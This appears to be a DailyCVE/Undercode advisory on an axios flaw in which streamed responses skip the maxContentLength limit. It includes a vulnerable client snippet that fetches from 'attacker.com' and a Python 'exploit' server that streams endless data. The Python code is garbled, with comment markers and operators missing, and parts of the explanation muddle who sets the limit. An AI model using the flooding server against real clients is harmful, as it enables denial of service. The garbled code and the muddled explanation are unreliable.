axios, maxContentLength Bypass, CVE-2026-42036 (Medium)

By /

Listen to this Post

How the mentioned CVE works:

  1. Axios versions prior to 1.15.1 and 0.31.1 contain a vulnerability in the HTTP adapter (lib/adapters/http.js).
  2. The flaw occurs when a request is made with the `responseType: ‘stream’` option. This is used for efficiently handling large responses.
  3. In the affected code, when the `responseType` is set to 'stream', the function immediately settles and returns the response stream object to the caller.
  4. The critical issue is that the logic for enforcing the `maxContentLength` limit is completely skipped in this code path.
  5. The `maxContentLength` check is only applied when Axios buffers the entire response body, such as with the default `’text’` or `’json’` response types.
  6. Consequently, an attacker can configure a request with a small `maxContentLength` value, like `1024` bytes.
  7. By also setting responseType: 'stream', they can force the application to ignore this limit.
  8. The HTTP adapter will then accept an HTTP response body of any size without any validation or truncation.
  9. This allows an attacker to send an arbitrarily large response to the client application.
  10. The client application, believing it is protected by the `maxContentLength` limit, will proceed to read and process the entire unbounded stream.
  11. This can lead to memory exhaustion, as the application may attempt to buffer the stream in memory for processing.
  12. Even if the application writes the stream to disk, it can cause disk space exhaustion.
  13. The weakness conforms to CWE-770 (Allocation of Resources Without Limits or Throttling).
  14. The final impact is a Denial of Service (DoS), as the uncontrolled resource consumption can crash the application or host.
  15. A Proof of Concept (PoC) involves a server returning a 2 MiB body and an Axios client requesting it with `responseType: ‘stream’` and maxContentLength: 1024.
  16. The control check, using responseType: 'text', correctly rejects the response, proving the bypass is specific to the stream handling logic.
  17. The vulnerability is present in both Node.js and browser environments when Axios is used for streaming requests.
  18. The issue was fixed by adding an `enforceMaxContentLength` async generator in the stream branch to track content length.
  19. If the received data exceeds maxContentLength, an error is immediately thrown and the stream is destroyed.
  20. This patch ensures the `maxContentLength` limit is enforced regardless of the `responseType` setting.

dailycve form:

Platform: `axios for Node.js`
Version: `<1.15.1,<0.31.1` Vulnerability : `maxContentLength stream bypass` Severity: `Medium (CVSS 5.3)` date: `2026-04-24`

Prediction: `Patch date same`

Analytics under heading What Undercode Say:

What Undercode Say:

Check installed Axios version
npm list axios
Identify if the version is vulnerable (<1.15.1 or <0.31.1)
npm list axios | grep -E "axios@[0-9]+.[0-9]+.[0-9]+" | grep -vE "axios@(1.1[5-9]|1.[2-9][0-9]|[2-9]|0.31.[1-9]|0.[0-9]{2,})"

// Vulnerable code pattern
const axios = require('axios');
async function vulnerableFetch() {
try {
const response = await axios({
method: 'get',
url: 'http://attacker.com/large-payload',
responseType: 'stream', // Bypasses maxContentLength
maxContentLength: 1024 // This limit is ignored!
});
// Attacker can now stream unlimited data to the application
response.data.on('data', (chunk) => {
// Process chunk - could lead to memory/disk exhaustion
});
} catch (error) {
console.error('Error:', error.message);
}
}

Exploit:

Simulate an attacker serving an unbounded stream
This server sends a never-ending stream of data
python3 -c "
import http.server
import socketserver
import time
class StreamingHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'application/octet-stream')
self.end_headers()
Send infinite data to exploit the vulnerable client
while True:
self.wfile.write(b'A' 1024 1024) Send 1MB chunks
time.sleep(0.1)
with socketserver.TCPServer(('', 8080), StreamingHandler) as httpd:
print('Serving unbounded stream at port 8080')
httpd.serve_forever()
"

Protection from this CVE:

Immediate Action: Upgrade Axios to version 1.15.1, 0.31.1, or any later release.
If an immediate upgrade is impossible, avoid using the `responseType: ‘stream’` option entirely.
Implement a custom stream wrapper that enforces a read limit and destroys the stream if a threshold is exceeded.
Deploy an HTTP reverse proxy (e.g., Nginx, HAProxy) in front of the application to enforce global response size limits.

Impact:

Type: Denial of Service (DoS) / Unbounded resource consumption.
An attacker can exhaust server memory by making a request that triggers an unlimited stream.
If the application writes the stream to disk, the attack can fill the available storage, causing a system-wide outage.
The attack is remotely exploitable over HTTP with low complexity and requires no privileges or user interaction (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
Applications that rely on `maxContentLength` as a security boundary while processing streamed Axios responses are directly impacted.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top